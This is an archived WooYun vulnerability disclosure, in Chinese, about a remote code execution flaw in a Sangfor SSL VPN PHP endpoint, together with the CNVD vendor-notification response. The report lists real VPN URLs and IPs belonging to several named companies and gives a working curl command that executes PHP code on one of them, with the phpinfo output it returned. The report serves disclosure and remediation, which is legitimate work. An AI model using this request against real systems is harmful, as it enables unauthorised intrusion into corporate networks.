乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-06-02: 细节已通知厂商并且等待厂商处理中 2013-06-03: 厂商已经确认,细节仅向厂商公开 2013-06-13: 细节向核心白帽子及相关领域专家公开 2013-06-23: 细节向普通白帽子公开 2013-07-03: 细节向实习白帽子公开 2013-07-17: 细节向公众公开
宅急送等企业某设备造成内网泄密包括些国企
http://vpn.zjs.com.cn:1000/cgi-bin/php-cgi/html/svpn.php 宅急送http://220.231.41.220:1000/cgi-bin/php-cgi/html/svpn.php 中纺集团https://61.163.104.181:4430/cgi-bin/php-cgi/html/svpn.php 郑州煤炭集团http://sslvpn.cifi.com.cn:1000/cgi-bin/php-cgi/html/svpn.php 旭辉集团http://60.216.53.122:1000/cgi-bin/php-cgi/html/svpn.php 山东浪潮http://222.85.86.119:1000/cgi-bin/php-cgi/html/svpn.php 郑州日产http://218.29.139.76:1000//cgi-bin/php-cgi/html/svpn.php 中原高速原漏洞 http://wooyun.org/bugs/wooyun-2010-017323
curl http://vpn.zjs.com.cn:1000/cgi-bin/php-cgi/html/svpn.php -d 'cmd=phpinfo();'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"><html><head><style type="text/css">body {background-color: #ffffff; color: #000000;}body, td, th, h1, h2 {font-family: sans-serif;}pre {margin: 0px; font-family: monospace;}a:link {color: #000099; text-decoration: none; background-color: #ffffff;}a:hover {text-decoration: underline;}table {border-collapse: collapse;}.center {text-align: center;}.center table { margin-left: auto; margin-right: auto; text-align: left;}.center th { text-align: center !important; }td, th { border: 1px solid #000000; font-size: 75%; vertical-align: baseline;}h1 {font-size: 150%;}h2 {font-size: 125%;}.p {text-align: left;}.e {background-color: #ccccff; font-weight: bold; color: #000000;}.h {background-color: #9999cc; font-weight: bold; color: #000000;}.v {background-color: #cccccc; color: #000000;}.vr {background-color: #cccccc; text-align: right; color: #000000;}img {float: right; border: 0px;}hr {width: 600px; background-color: #cccccc; border: 0px; height: 1px; color: #000000;}</style><title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head><body><div class="center"><table border="0" cellpadding="3" width="600"><tr class="h"><td><a href="http://www.php.net/"><img border="0" src="/cgi-bin/php-cgi?=PHPE9568F34-D428-11d2-A769-00AA001ACF42" alt="PHP Logo" /></a><h1 class="p">PHP Version 5.3.2</h1></td></tr></table><br /><table border="0" cellpadding="3" width="600"><tr><td class="e">System </td><td class="v">Linux Sangfor 2.4.32-web100-bic #86 SMP Fri Apr 8 14:26:30 CST 2011 i686 </td></tr><tr><td class="e">Build Date </td><td class="v">Mar 2 2013 11:57:29 </td></tr><tr><td class="e">Configure Command </td><td class="v"> './configure' '--disable-all' '--with-pcre-regex' '--enable-filter' '--enable-hash' '--enable-json' '--enable-posix' '--enable-session' '--enable-dba' '--enable-ftp' '--enable-sysvmsg' '--enable-sysvsem' '--enable-sysvshm' '--enable-pdo' '--enable-sockets' '--with-pdo-sqlite=/usr/local/sqlite3' '--with-qdbm=/usr/local/qdbm14' '--enable-inifile' '--with-gettext' '--with-iconv=/usr/local' '--enable-dom' '--enable-libxml' '--with-libxml-dir=/usr/local/libxml2' '--enable-mbstring=all' '--with-svpn_php=/usr/local/M50' '--with-strdes' '--with-curl' '--with-gd=/usr/local' '--enable-gd-native-ttf' '--with-freetype-dir=/usr/local' '--disable-cli' '--with-ldap=/usr/local/openldap' '--enable-pcntl' '--with-zlib-dir=/usr' </td></tr><tr><td class="e">Server API </td><td class="v">CGI/FastCGI </td></tr><tr><td class="e">Virtual Directory Support </td><td class="v">disabled </td></tr><tr><td class="e">Configuration File (php.ini) Path </td><td class="v">/usr/local/lib </td></tr><tr><td class="e">Loaded Configuration File </td><td class="v">/app/usr/local/lib/php.ini </td></tr><tr><td class="e">Scan this dir for additional .ini files </td><td class="v">(none) </td></tr><tr><td class="e">Additional .ini files parsed </td><td class="v">(none) </td></tr><tr><td class="e">PHP API </td><td class="v">20090626 </td></tr><tr><td class="e">PHP Extension </td><td class="v">20090626 </td></tr><tr><td class="e">Zend Extension </td><td class="v">220090626 </td></tr><tr><td class="e">Zend Extension Build </td><td class="v">API220090626,NTS </td></tr><tr><td class="e">PHP Extension Build </td><td class="v">API20090626,NTS </td></tr><tr><td class="e">Debug Build </td><td class="v">no </td></tr><tr><td class="e">Thread Safety </td><td class="v">disabled </td></tr>
Da Bu Ding
危害等级:高
漏洞Rank:15
确认时间:2013-06-03 22:32
CNVD确认并复现所述情况,为版本为升级所致(<=M5.6),已经在3日上午根据测试结果通报给设备生产厂商(深信服公司),由于相关客户未在CNCERT以往处置的政府或重要单位列表,将由CNCERT监督生产厂商做好用户应急响应工作。按通用软件漏洞进行评分,rank 15。同时也请白帽子提供检测发现目标的方法,以便后续深入检测,谢谢。
暂无